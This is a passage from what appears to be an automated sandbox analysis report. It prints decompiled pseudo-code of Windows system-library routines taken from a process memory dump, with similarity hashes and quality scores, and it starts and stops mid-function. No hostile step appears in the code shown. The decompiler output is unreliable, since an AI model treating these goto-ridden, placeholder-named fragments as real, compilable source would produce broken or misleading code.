                                                    					L10:
                                                    					_t22 = 0;
                                                    				} else {
                                                    					_t24 = _v8 + __ecx;
                                                    					_t42 = _t24;
                                                    					if(_t24 < __ecx) {
                                                    						goto L10;
                                                    					} else {
                                                    						if(E04B7F3D5( &_v8, _a8 * _a12, _a8 * _a12 >> 0x20) < 0) {
                                                    							goto L10;
                                                    						} else {
                                                    							_t29 = _v8 + _t42;
                                                    							if(_t29 < _t42) {
                                                    								goto L10;
                                                    							} else {
                                                    								_t47 = _t29;
                                                    								_t30 = _a16;
                                                    								if(_t30 != 0) {
                                                    									 *_t30 = _t47;
                                                    								}
                                                    								if(_t47 == 0) {
                                                    									goto L10;
                                                    								} else {
                                                    									_t22 = L04B64620(_t36,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 8, _t47);
                                                    								}
                                                    							}
                                                    						}
                                                    					}
                                                    				}
                                                    				return _t22;
                                                    			}











                                                    Memory Dump Source
                                                    • Source File: 0000000A.00000002.616762528.0000000004B20000.00000040.00000001.sdmp, Offset: 04B20000, based on PE: true
                                                    • Associated: 0000000A.00000002.617248477.0000000004C3B000.00000040.00000001.sdmp
                                                    • Associated: 0000000A.00000002.617273296.0000000004C3F000.00000040.00000001.sdmp
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: 0f0f9780e106b949b133bc76075252866a2fc865c05abd63e27a9356099b865c
                                                    • Instruction ID: dddccdde3c73a85eeaf5982c1a190a62e94429dfd6e30d38e21941832e911077
                                                    • Opcode Fuzzy Hash: 0f0f9780e106b949b133bc76075252866a2fc865c05abd63e27a9356099b865c
                                                    • Instruction Fuzzy Hash: 13018432700119AFE720AE5EDC51F6BB7ADEB84760F2505A4BD19CB260DE30ED01A7A4
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    C-Code - Quality: 69%
                                                    			E04B49080(void* __ebx, intOrPtr* __ecx, void* __edi, void* __esi) {
                                                    				intOrPtr* _t51;
                                                    				intOrPtr _t59;
                                                    				signed int _t64;
                                                    				signed int _t67;
                                                    				signed int* _t71;
                                                    				signed int _t74;
                                                    				signed int _t77;
                                                    				signed int _t82;
                                                    				intOrPtr* _t84;
                                                    				void* _t85;
                                                    				intOrPtr* _t87;
                                                    				void* _t94;
                                                    				signed int _t95;
                                                    				intOrPtr* _t97;
                                                    				signed int _t99;
                                                    				signed int _t102;
                                                    				void* _t104;
                                                    
                                                    				_push(__ebx);
                                                    				_push(__esi);
                                                    				_push(__edi);
                                                    				_t97 = __ecx;
                                                    				_t102 =  *(__ecx + 0x14);
                                                    				if((_t102 & 0x02ffffff) == 0x2000000) {
                                                    					_t102 = _t102 | 0x000007d0;
                                                    				}
                                                    				_t48 =  *[fs:0x30];
                                                    				if( *((intOrPtr*)( *[fs:0x30] + 0x64)) == 1) {
                                                    					_t102 = _t102 & 0xff000000;
                                                    				}
                                                    				_t80 = 0x4c385ec;
                                                    				E04B62280(_t48, 0x4c385ec);
                                                    				_t51 =  *_t97 + 8;
                                                    				if( *_t51 != 0) {
                                                    					L6:
                                                    					return E04B5FFB0(_t80, _t97, _t80);
                                                    				} else {
                                                    					 *(_t97 + 0x14) = _t102;
                                                    					_t84 =  *0x4c3538c; // 0xcaad68
                                                    					if( *_t84 != 0x4c35388) {
                                                    						_t85 = 3;
                                                    						asm("int 0x29");
                                                    						asm("int3");
                                                    						asm("int3");
                                                    						asm("int3");
                                                    						asm("int3");
                                                    						asm("int3");
                                                    						asm("int3");
                                                    						asm("int3");
                                                    						asm("int3");
                                                    						asm("int3");
                                                    						asm("int3");
                                                    						asm("int3");
                                                    						asm("int3");
                                                    						_push(0x2c);
                                                    						_push(0x4c1f6e8);
                                                    						E04B9D0E8(0x4c385ec, _t97, _t102);
                                                    						 *((char*)(_t104 - 0x1d)) = 0;
                                                    						_t99 =  *(_t104 + 8);
                                                    						__eflags = _t99;
                                                    						if(_t99 == 0) {
                                                    							L13:
                                                    							__eflags =  *((char*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0x28));
                                                    							if(__eflags == 0) {
                                                    								E04C188F5(_t80, _t85, 0x4c35388, _t99, _t102, __eflags);
                                                    							}
                                                    						} else {
                                                    							__eflags = _t99 -  *0x4c386c0; // 0xc907b0
                                                    							if(__eflags == 0) {
                                                    								goto L13;
                                                    							} else {
                                                    								__eflags = _t99 -  *0x4c386b8; // 0x0
                                                    								if(__eflags == 0) {
                                                    									goto L13;
                                                    								} else {
                                                    									_t59 =  *((intOrPtr*)( *[fs:0x30] + 0xc));
                                                    									__eflags =  *((char*)(_t59 + 0x28));
                                                    									if( *((char*)(_t59 + 0x28)) == 0) {
                                                    										E04B62280(_t99 + 0xe0, _t99 + 0xe0);
                                                    										 *(_t104 - 4) =  *(_t104 - 4) & 0x00000000;
                                                    										__eflags =  *((char*)(_t99 + 0xe5));
                                                    										if(__eflags != 0) {
                                                    											E04C188F5(0x4c385ec, _t85, 0x4c35388, _t99, _t102, __eflags);
                                                    										} else {
                                                    											__eflags =  *((char*)(_t99 + 0xe4));
                                                    											if( *((char*)(_t99 + 0xe4)) == 0) {
                                                    												 *((char*)(_t99 + 0xe4)) = 1;
                                                    												_push(_t99);
                                                    												_push( *((intOrPtr*)(_t99 + 0x24)));
                                                    												E04B8AFD0();
                                                    											}
                                                    											while(1) {
                                                    												_t71 = _t99 + 8;
                                                    												 *(_t104 - 0x2c) = _t71;
                                                    												_t80 =  *_t71;
                                                    												_t95 = _t71[1];
                                                    												 *(_t104 - 0x28) = _t80;
                                                    												 *(_t104 - 0x24) = _t95;
                                                    												while(1) {
                                                    													L19:
                                                    													__eflags = _t95;
                                                    													if(_t95 == 0) {
                                                    														break;
                                                    													}
                                                    													_t102 = _t80;
                                                    													 *(_t104 - 0x30) = _t95;
                                                    													 *(_t104 - 0x24) = _t95 - 1;
                                                    													asm("lock cmpxchg8b [edi]");
                                                    													_t80 = _t102;
                                                    													 *(_t104 - 0x28) = _t80;
                                                    													 *(_t104 - 0x24) = _t95;
                                                    													__eflags = _t80 - _t102;
                                                    													_t99 =  *(_t104 + 8);
                                                    													if(_t80 != _t102) {
                                                    														continue;
                                                    													} else {
                                                    														__eflags = _t95 -  *(_t104 - 0x30);
                                                    														if(_t95 !=  *(_t104 - 0x30)) {
                                                    															continue;
                                                    														} else {
                                                    															__eflags = _t95;
                                                    															if(_t95 != 0) {
                                                    																_t74 = 0;
                                                    																 *(_t104 - 0x34) = 0;
                                                    																_t102 = 0;
                                                    																__eflags = 0;
                                                    																while(1) {
                                                    																	 *(_t104 - 0x3c) = _t102;
                                                    																	__eflags = _t102 - 3;
                                                    																	if(_t102 >= 3) {
                                                    																		break;
                                                    																	}
                                                    																	__eflags = _t74;
                                                    																	if(_t74 != 0) {
                                                    																		L49:
                                                    																		_t102 =  *_t74;
                                                    																		__eflags = _t102;
                                                    																		if(_t102 != 0) {
                                                    																			_t102 =  *(_t102 + 4);
                                                    																			__eflags = _t102;
                                                    																			if(_t102 != 0) {
                                                    																				 *0x4c3b1e0(_t74, _t99);
                                                    																				 *_t102();
                                                    																			}
                                                    																		}
                                                    																		do {
                                                    																			_t71 = _t99 + 8;
                                                    																			 *(_t104 - 0x2c) = _t71;
                                                    																			_t80 =  *_t71;
                                                    																			_t95 = _t71[1];
                                                    																			 *(_t104 - 0x28) = _t80;
                                                    																			 *(_t104 - 0x24) = _t95;
                                                    																			goto L19;
                                                    																		} while (_t74 == 0);
                                                    																		goto L49;
                                                    																	} else {
                                                    																		_t82 = 0;
                                                    																		__eflags = 0;
                                                    																		while(1) {
                                                    																			 *(_t104 - 0x38) = _t82;
                                                    																			__eflags = _t82 -  *0x4c384c0;
                                                    																			if(_t82 >=  *0x4c384c0) {
                                                    																				break;
                                                    																			}
                                                    																			__eflags = _t74;
                                                    																			if(_t74 == 0) {
                                                    																				_t77 = E04C19063(_t82 * 0xc +  *((intOrPtr*)(_t99 + 0x10 + _t102 * 4)), _t95, _t99);
                                                    																				__eflags = _t77;
                                                    																				if(_t77 == 0) {
                                                    																					_t74 = 0;
                                                    																					__eflags = 0;
                                                    																				} else {
                                                    																					_t74 = _t77 + 0xfffffff4;
                                                    																				}
                                                    																				 *(_t104 - 0x34) = _t74;
                                                    																				_t82 = _t82 + 1;
                                                    																				continue;
                                                    																			}
                                                    																			break;
                                                    																		}
                                                    																		_t102 = _t102 + 1;
                                                    																		continue;
                                                    																	}
                                                    																	goto L20;
                                                    																}
                                                    																__eflags = _t74;
                                                    															}
                                                    														}
                                                    													}
                                                    													break;
                                                    												}
                                                    												L20:
                                                    												 *((intOrPtr*)(_t99 + 0xf4)) =  *((intOrPtr*)(_t104 + 4));
                                                    												 *((char*)(_t99 + 0xe5)) = 1;
                                                    												 *((char*)(_t104 - 0x1d)) = 1;
                                                    												goto L21;
                                                    											}
                                                    										}
                                                    										L21:
                                                    										 *(_t104 - 4) = 0xfffffffe;
                                                    										E04B4922A(_t99);
                                                    										_t64 = E04B67D50();
                                                    										__eflags = _t64;
                                                    										if(_t64 != 0) {
                                                    											_t67 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22c;
                                                    										} else {
                                                    											_t67 = 0x7ffe0386;
                                                    										}
                                                    										__eflags =  *_t67;
                                                    										if( *_t67 != 0) {
                                                    											_t67 = E04C18B58(_t99);
                                                    										}
                                                    										__eflags =  *((char*)(_t104 - 0x1d));
                                                    										if( *((char*)(_t104 - 0x1d)) != 0) {
                                                    											__eflags = _t99 -  *0x4c386c0; // 0xc907b0
                                                    											if(__eflags != 0) {
                                                    												__eflags = _t99 -  *0x4c386b8; // 0x0
                                                    												if(__eflags == 0) {
                                                    													_t94 = 0x4c386bc;
                                                    													_t87 = 0x4c386b8;
                                                    													goto L27;
                                                    												} else {
                                                    													__eflags = _t67 | 0xffffffff;
                                                    													asm("lock xadd [edi], eax");
                                                    													if(__eflags == 0) {
                                                    														E04B49240(_t80, _t99, _t99, _t102, __eflags);
                                                    													}
                                                    												}
                                                    											} else {
                                                    												_t94 = 0x4c386c4;
                                                    												_t87 = 0x4c386c0;
                                                    												L27:
                                                    												E04B79B82(_t80, _t87, _t94, _t99, _t102, __eflags);
                                                    											}
                                                    										}
                                                    									} else {
                                                    										goto L13;
                                                    									}
                                                    								}
                                                    							}
                                                    						}
                                                    						return E04B9D130(_t80, _t99, _t102);
                                                    					} else {
                                                    						 *_t51 = 0x4c35388;
                                                    						 *((intOrPtr*)(_t51 + 4)) = _t84;
                                                    						 *_t84 = _t51;
                                                    						 *0x4c3538c = _t51;
                                                    						goto L6;
                                                    					}
                                                    				}
                                                    			}


                                                    Memory Dump Source
                                                    • Source File: 0000000A.00000002.616762528.0000000004B20000.00000040.00000001.sdmp, Offset: 04B20000, based on PE: true
                                                    • Associated: 0000000A.00000002.617248477.0000000004C3B000.00000040.00000001.sdmp
                                                    • Associated: 0000000A.00000002.617273296.0000000004C3F000.00000040.00000001.sdmp
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: 8d41fcdd3dd37732bab43b8b80007a950e64ffa51727b0e117fa77c8d1a3aa28
                                                    • Instruction ID: c71a6e64b472fe3e6fa3665e27b04ca32fa9add5cfe94e094a425c768b8442d5
                                                    • Opcode Fuzzy Hash: 8d41fcdd3dd37732bab43b8b80007a950e64ffa51727b0e117fa77c8d1a3aa28
                                                    • Instruction Fuzzy Hash: 8B01AFB2601604AFE7299F28D840B22BBF9EB85725F2540A6E5059B791D378FC41DBA0
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    C-Code - Quality: 46%
                                                    			E04BDC450(intOrPtr* _a4) {
                                                    				signed char _t25;
                                                    				intOrPtr* _t26;
                                                    				intOrPtr* _t27;
                                                    
                                                    				_t26 = _a4;
                                                    				_t25 =  *(_t26 + 0x10);
                                                    				if((_t25 & 0x00000003) != 1) {
                                                    					_push(0);
                                                    					_push(0);
                                                    					_push(0);
                                                    					_push( *((intOrPtr*)(_t26 + 8)));
                                                    					_push(0);
                                                    					_push( *_t26);
                                                    					E04B89910();
                                                    					_t25 =  *(_t26 + 0x10);
                                                    				}
                                                    				if((_t25 & 0x00000001) != 0) {
                                                    					_push(4);
                                                    					_t7 = _t26 + 4; // 0x4
                                                    					_t27 = _t7;
                                                    					_push(_t27);
                                                    					_push(5);
                                                    					_push(0xfffffffe);
                                                    					E04B895B0();
                                                    					if( *_t27 != 0) {
                                                    						_push( *_t27);
                                                    						E04B895D0();
                                                    					}
                                                    				}
                                                    				_t8 = _t26 + 0x14; // 0x14
                                                    				if( *((intOrPtr*)(_t26 + 8)) != _t8) {
                                                    					L04B677F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0,  *((intOrPtr*)(_t26 + 8)));
                                                    				}
                                                    				_push( *_t26);
                                                    				E04B895D0();
                                                    				return L04B677F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t26);
                                                    			}


                                                    Memory Dump Source
                                                    • Source File: 0000000A.00000002.616762528.0000000004B20000.00000040.00000001.sdmp, Offset: 04B20000, based on PE: true
                                                    • Associated: 0000000A.00000002.617248477.0000000004C3B000.00000040.00000001.sdmp
                                                    • Associated: 0000000A.00000002.617273296.0000000004C3F000.00000040.00000001.sdmp
                                                    Similarity
                                                    • API ID: InitializeThunk
                                                    • String ID:
                                                    • API String ID: 2994545307-0
                                                    • Opcode ID: efb8dbafbc21be99c6828cd6b94329c97088fdc8e1727ade4875afce538aa955
                                                    • Instruction ID: d1ae8975fb45344bcb20f22f901b13e5fcb56c5486b34ef517fae9bb2d2be80f
                                                    • Opcode Fuzzy Hash: efb8dbafbc21be99c6828cd6b94329c97088fdc8e1727ade4875afce538aa955
                                                    • Instruction Fuzzy Hash: AB0192B2140605BFEB21AF69CC80EB2FB7DFF54798F1045A9F11542560DB25BCA1CAA0
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    C-Code - Quality: 86%
                                                    			E04C14015(signed int __eax, signed int __ecx) {
                                                    				void* __ebx;
                                                    				void* __edi;
                                                    				signed char _t10;
                                                    				signed int _t28;
                                                    
                                                    				_push(__ecx);
                                                    				_t28 = __ecx;
                                                    				asm("lock xadd [edi+0x24], eax");
                                                    				_t10 = (__eax | 0xffffffff) - 1;
                                                    				if(_t10 == 0) {
                                                    					_t1 = _t28 + 0x1c; // 0x1e
                                                    					E04B62280(_t10, _t1);
                                                    					 *((intOrPtr*)(_t28 + 0x20)) =  *((intOrPtr*)( *[fs:0x18] + 0x24));
                                                    					E04B62280( *((intOrPtr*)( *[fs:0x18] + 0x24)), 0x4c386ac);
                                                    					E04B4F900(0x4c386d4, _t28);
                                                    					E04B5FFB0(0x4c386ac, _t28, 0x4c386ac);
                                                    					 *((intOrPtr*)(_t28 + 0x20)) = 0;
                                                    					E04B5FFB0(0, _t28, _t1);
                                                    					_t18 =  *((intOrPtr*)(_t28 + 0x94));
                                                    					if( *((intOrPtr*)(_t28 + 0x94)) != 0) {
                                                    						L04B677F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t18);
                                                    					}
                                                    					_t10 = L04B677F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t28);
                                                    				}
                                                    				return _t10;
                                                    			}








                                                    Memory Dump Source
                                                    • Source File: 0000000A.00000002.616762528.0000000004B20000.00000040.00000001.sdmp, Offset: 04B20000, based on PE: true
                                                    • Associated: 0000000A.00000002.617248477.0000000004C3B000.00000040.00000001.sdmp
                                                    • Associated: 0000000A.00000002.617273296.0000000004C3F000.00000040.00000001.sdmp
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: 075d22e2da72cca715c363ce6e83057c26866e609b255bdbfb71ba3292d4ea7c
                                                    • Instruction ID: 5eea7853ee9bf83cdfcf8aff559a30f8f1f51fcc9824b740c1abbb074feab8c7
                                                    • Opcode Fuzzy Hash: 075d22e2da72cca715c363ce6e83057c26866e609b255bdbfb71ba3292d4ea7c
                                                    • Instruction Fuzzy Hash: 1E0184712416457FE615BB69CD80E23F7ACEB45758B000665B50883A21CB28FD11C6E4
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    C-Code - Quality: 61%
                                                    			E04C014FB(intOrPtr __ebx, intOrPtr __ecx, intOrPtr __edx, intOrPtr _a4, intOrPtr _a8) {
                                                    				signed int _v8;
                                                    				intOrPtr _v16;
                                                    				intOrPtr _v20;
                                                    				intOrPtr _v24;
                                                    				intOrPtr _v28;
                                                    				short _v54;
                                                    				char _v60;
                                                    				void* __edi;
                                                    				void* __esi;
                                                    				signed char* _t21;
                                                    				intOrPtr _t27;
                                                    				intOrPtr _t33;
                                                    				intOrPtr _t34;
                                                    				signed int _t35;
                                                    
                                                    				_t32 = __edx;
                                                    				_t27 = __ebx;
                                                    				_v8 =  *0x4c3d360 ^ _t35;
                                                    				_t33 = __edx;
                                                    				_t34 = __ecx;
                                                    				E04B8FA60( &_v60, 0, 0x30);
                                                    				_v20 = _a4;
                                                    				_v16 = _a8;
                                                    				_v28 = _t34;
                                                    				_v24 = _t33;
                                                    				_v54 = 0x1034;
                                                    				if(E04B67D50() == 0) {
                                                    					_t21 = 0x7ffe0388;
                                                    				} else {
                                                    					_t21 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22e;
                                                    				}
                                                    				_push( &_v60);
                                                    				_push(0x10);
                                                    				_push(0x20402);
                                                    				_push( *_t21 & 0x000000ff);
                                                    				return E04B8B640(E04B89AE0(), _t27, _v8 ^ _t35, _t32, _t33, _t34);
                                                    			}


















                                                    Memory Dump Source
                                                    • Source File: 0000000A.00000002.616762528.0000000004B20000.00000040.00000001.sdmp, Offset: 04B20000, based on PE: true
                                                    • Associated: 0000000A.00000002.617248477.0000000004C3B000.00000040.00000001.sdmp
                                                    • Associated: 0000000A.00000002.617273296.0000000004C3F000.00000040.00000001.sdmp
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: 534d57c44a4554cb31d55cdcee21f9cc50269cf0ea0434d55c42aee050b1f25e
                                                    • Instruction ID: 032d1a1afb63605807bcb22d9a446cb6fc7753879ae8ce0cd242a2f9296663f7
                                                    • Opcode Fuzzy Hash: 534d57c44a4554cb31d55cdcee21f9cc50269cf0ea0434d55c42aee050b1f25e
                                                    • Instruction Fuzzy Hash: A401B571A00248AFDB04EFA9D841FAEB7B8EF44714F04405AF905EB380DA74EE01CB94
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    C-Code - Quality: 61%
                                                    			E04C0138A(intOrPtr __ebx, intOrPtr __ecx, intOrPtr __edx, intOrPtr _a4, intOrPtr _a8) {
                                                    				signed int _v8;
                                                    				intOrPtr _v16;
                                                    				intOrPtr _v20;
                                                    				intOrPtr _v24;
                                                    				intOrPtr _v28;
                                                    				short _v54;
                                                    				char _v60;
                                                    				void* __edi;
                                                    				void* __esi;
                                                    				signed char* _t21;
                                                    				intOrPtr _t27;
                                                    				intOrPtr _t33;
                                                    				intOrPtr _t34;
                                                    				signed int _t35;
                                                    
                                                    				_t32 = __edx;
                                                    				_t27 = __ebx;
                                                    				_v8 =  *0x4c3d360 ^ _t35;
                                                    				_t33 = __edx;
                                                    				_t34 = __ecx;
                                                    				E04B8FA60( &_v60, 0, 0x30);
                                                    				_v20 = _a4;
                                                    				_v16 = _a8;
                                                    				_v28 = _t34;
                                                    				_v24 = _t33;
                                                    				_v54 = 0x1033;
                                                    				if(E04B67D50() == 0) {
                                                    					_t21 = 0x7ffe0388;
                                                    				} else {
                                                    					_t21 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22e;
                                                    				}
                                                    				_push( &_v60);
                                                    				_push(0x10);
                                                    				_push(0x20402);
                                                    				_push( *_t21 & 0x000000ff);
                                                    				return E04B8B640(E04B89AE0(), _t27, _v8 ^ _t35, _t32, _t33, _t34);
                                                    			}


















                                                    Memory Dump Source
                                                    • Source File: 0000000A.00000002.616762528.0000000004B20000.00000040.00000001.sdmp, Offset: 04B20000, based on PE: true
                                                    • Associated: 0000000A.00000002.617248477.0000000004C3B000.00000040.00000001.sdmp
                                                    • Associated: 0000000A.00000002.617273296.0000000004C3F000.00000040.00000001.sdmp
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: 687a7ac4428a17fbbd43df6960dbf78bdf5c2b51fad535e0dd248f055e31da5b
                                                    • Instruction ID: 1fecf8fffb50e73ccd0f72e045794775b22e5832817d3fa6b03b9e7ac17c3e6c
                                                    • Opcode Fuzzy Hash: 687a7ac4428a17fbbd43df6960dbf78bdf5c2b51fad535e0dd248f055e31da5b
                                                    • Instruction Fuzzy Hash: 9A015271A00218AFDB14EFA9D881FAEB7B8EF44714F04405AF905EB280DA75EE01C794
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    C-Code - Quality: 91%
                                                    			E04B458EC(intOrPtr __ecx) {
                                                    				signed int _v8;
                                                    				char _v28;
                                                    				char _v44;
                                                    				char _v76;
                                                    				void* __edi;
                                                    				void* __esi;
                                                    				intOrPtr _t10;
                                                    				intOrPtr _t16;
                                                    				intOrPtr _t17;
                                                    				intOrPtr _t27;
                                                    				intOrPtr _t28;
                                                    				signed int _t29;
                                                    
                                                    				_v8 =  *0x4c3d360 ^ _t29;
                                                    				_t10 =  *[fs:0x30];
                                                    				_t27 = __ecx;
                                                    				if(_t10 == 0) {
                                                    					L6:
                                                    					_t28 = 0x4b25c80;
                                                    				} else {
                                                    					_t16 =  *((intOrPtr*)(_t10 + 0x10));
                                                    					if(_t16 == 0) {
                                                    						goto L6;
                                                    					} else {
                                                    						_t28 =  *((intOrPtr*)(_t16 + 0x3c));
                                                    					}
                                                    				}
                                                    				if(E04B45943() != 0 &&  *0x4c35320 > 5) {
                                                    					E04BC7B5E( &_v44, _t27);
                                                    					_t22 =  &_v28;
                                                    					E04BC7B5E( &_v28, _t28);
                                                    					_t11 = E04BC7B9C(0x4c35320, 0x4b2bf15,  &_v28, _t22, 4,  &_v76);
                                                    				}
                                                    				return E04B8B640(_t11, _t17, _v8 ^ _t29, 0x4b2bf15, _t27, _t28);
                                                    			}
















                                                    Memory Dump Source
                                                    • Source File: 0000000A.00000002.616762528.0000000004B20000.00000040.00000001.sdmp, Offset: 04B20000, based on PE: true
                                                    • Associated: 0000000A.00000002.617248477.0000000004C3B000.00000040.00000001.sdmp
                                                    • Associated: 0000000A.00000002.617273296.0000000004C3F000.00000040.00000001.sdmp
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: 3f12d39477fe9f69372a18eef491b5d9e56e64f539f340b54232727ad9750bbc
                                                    • Instruction ID: 6b00ae9e377e836a6b04c96062940be846ee72f754518de09449eb40c37e8785
                                                    • Opcode Fuzzy Hash: 3f12d39477fe9f69372a18eef491b5d9e56e64f539f340b54232727ad9750bbc
                                                    • Instruction Fuzzy Hash: A201A735B04518BBE724EE79D8509BE77BCEFC4234F9400E9AA05A7240EE30FD01D651
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    C-Code - Quality: 100%
                                                    			E04B5B02A(intOrPtr __ecx, signed short* __edx, short _a4) {
                                                    				signed char _t11;
                                                    				signed char* _t12;
                                                    				intOrPtr _t24;
                                                    				signed short* _t25;
                                                    
                                                    				_t25 = __edx;
                                                    				_t24 = __ecx;
                                                    				_t11 = ( *[fs:0x30])[0x50];
                                                    				if(_t11 != 0) {
                                                    					if( *_t11 == 0) {
                                                    						goto L1;
                                                    					}
                                                    					_t12 = ( *[fs:0x30])[0x50] + 0x22a;
                                                    					L2:
                                                    					if( *_t12 != 0) {
                                                    						_t12 =  *[fs:0x30];
                                                    						if((_t12[0x240] & 0x00000004) == 0) {
                                                    							goto L3;
                                                    						}
                                                    						if(E04B67D50() == 0) {
                                                    							_t12 = 0x7ffe0385;
                                                    						} else {
                                                    							_t12 = ( *[fs:0x30])[0x50] + 0x22b;
                                                    						}
                                                    						if(( *_t12 & 0x00000020) == 0) {
                                                    							goto L3;
                                                    						}
                                                    						return E04BC7016(_a4, _t24, 0, 0, _t25, 0);
                                                    					}
                                                    					L3:
                                                    					return _t12;
                                                    				}
                                                    				L1:
                                                    				_t12 = 0x7ffe0384;
                                                    				goto L2;
                                                    			}








                                                    Memory Dump Source
                                                    • Source File: 0000000A.00000002.616762528.0000000004B20000.00000040.00000001.sdmp, Offset: 04B20000, based on PE: true
                                                    • Associated: 0000000A.00000002.617248477.0000000004C3B000.00000040.00000001.sdmp
                                                    • Associated: 0000000A.00000002.617273296.0000000004C3F000.00000040.00000001.sdmp
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: 2e61b3b4b4670f516fc01dc09380e60ecf2e8637ce05565c6f774399af743f4d
                                                    • Instruction ID: 2d01b010ec2563f138c05a4b331d43f55d4318d7c5c13195ce98982a9c99475f
                                                    • Opcode Fuzzy Hash: 2e61b3b4b4670f516fc01dc09380e60ecf2e8637ce05565c6f774399af743f4d
                                                    • Instruction Fuzzy Hash: 8B0171712085809FD326D76CC984F66B7D8EB45754F0D40E1E915CB6A1D628FC40C620
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    C-Code - Quality: 100%
                                                    			E04C11074(intOrPtr __ebx, signed int* __ecx, char __edx, void* __edi, intOrPtr _a4) {
                                                    				char _v8;
                                                    				void* _v11;
                                                    				unsigned int _v12;
                                                    				void* _v15;
                                                    				void* __esi;
                                                    				void* __ebp;
                                                    				char* _t16;
                                                    				signed int* _t35;
                                                    
                                                    				_t22 = __ebx;
                                                    				_t35 = __ecx;
                                                    				_v8 = __edx;
                                                    				_t13 =  !( *__ecx) + 1;
                                                    				_v12 =  !( *__ecx) + 1;
                                                    				if(_a4 != 0) {
                                                    					E04C1165E(__ebx, 0x4c38ae4, (__edx -  *0x4c38b04 >> 0x14) + (__edx -  *0x4c38b04 >> 0x14), __edi, __ecx, (__edx -  *0x4c38b04 >> 0x14) + (__edx -  *0x4c38b04 >> 0x14), (_t13 >> 0x14) + (_t13 >> 0x14));
                                                    				}
                                                    				E04C0AFDE( &_v8,  &_v12, 0x8000,  *((intOrPtr*)(_t35 + 0x34)),  *((intOrPtr*)(_t35 + 0x38)));
                                                    				if(E04B67D50() == 0) {
                                                    					_t16 = 0x7ffe0388;
                                                    				} else {
                                                    					_t16 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22e;
                                                    				}
                                                    				if( *_t16 != 0) {
                                                    					_t16 = E04BFFE3F(_t22, _t35, _v8, _v12);
                                                    				}
                                                    				return _t16;
                                                    			}












                                                    Memory Dump Source
                                                    • Source File: 0000000A.00000002.616762528.0000000004B20000.00000040.00000001.sdmp, Offset: 04B20000, based on PE: true
                                                    • Associated: 0000000A.00000002.617248477.0000000004C3B000.00000040.00000001.sdmp
                                                    • Associated: 0000000A.00000002.617273296.0000000004C3F000.00000040.00000001.sdmp
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    C-Code - Quality: 59%
                                                    			E04BFFEC0(intOrPtr __ebx, intOrPtr __ecx, intOrPtr __edx, intOrPtr _a4) {
                                                    				signed int _v12;
                                                    				intOrPtr _v24;
                                                    				intOrPtr _v28;
                                                    				intOrPtr _v32;
                                                    				short _v58;
                                                    				char _v64;
                                                    				void* __edi;
                                                    				void* __esi;
                                                    				signed char* _t18;
                                                    				intOrPtr _t24;
                                                    				intOrPtr _t30;
                                                    				intOrPtr _t31;
                                                    				signed int _t32;
                                                    
                                                    				_t29 = __edx;
                                                    				_t24 = __ebx;
                                                    				_v12 =  *0x4c3d360 ^ _t32;
                                                    				_t30 = __edx;
                                                    				_t31 = __ecx;
                                                    				E04B8FA60( &_v64, 0, 0x30);
                                                    				_v24 = _a4;
                                                    				_v32 = _t31;
                                                    				_v28 = _t30;
                                                    				_v58 = 0x266;
                                                    				if(E04B67D50() == 0) {
                                                    					_t18 = 0x7ffe0388;
                                                    				} else {
                                                    					_t18 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22e;
                                                    				}
                                                    				_push( &_v64);
                                                    				_push(0x10);
                                                    				_push(0x20402);
                                                    				_push( *_t18 & 0x000000ff);
                                                    				return E04B8B640(E04B89AE0(), _t24, _v12 ^ _t32, _t29, _t30, _t31);
                                                    			}

















                                                    Memory Dump Source
                                                    • Source File: 0000000A.00000002.616762528.0000000004B20000.00000040.00000001.sdmp, Offset: 04B20000, based on PE: true
                                                    • Associated: 0000000A.00000002.617248477.0000000004C3B000.00000040.00000001.sdmp
                                                    • Associated: 0000000A.00000002.617273296.0000000004C3F000.00000040.00000001.sdmp
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    C-Code - Quality: 59%
                                                    			E04BFFE3F(intOrPtr __ebx, intOrPtr __ecx, intOrPtr __edx, intOrPtr _a4) {
                                                    				signed int _v12;
                                                    				intOrPtr _v24;
                                                    				intOrPtr _v28;
                                                    				intOrPtr _v32;
                                                    				short _v58;
                                                    				char _v64;
                                                    				void* __edi;
                                                    				void* __esi;
                                                    				signed char* _t18;
                                                    				intOrPtr _t24;
                                                    				intOrPtr _t30;
                                                    				intOrPtr _t31;
                                                    				signed int _t32;
                                                    
                                                    				_t29 = __edx;
                                                    				_t24 = __ebx;
                                                    				_v12 =  *0x4c3d360 ^ _t32;
                                                    				_t30 = __edx;
                                                    				_t31 = __ecx;
                                                    				E04B8FA60( &_v64, 0, 0x30);
                                                    				_v24 = _a4;
                                                    				_v32 = _t31;
                                                    				_v28 = _t30;
                                                    				_v58 = 0x267;
                                                    				if(E04B67D50() == 0) {
                                                    					_t18 = 0x7ffe0388;
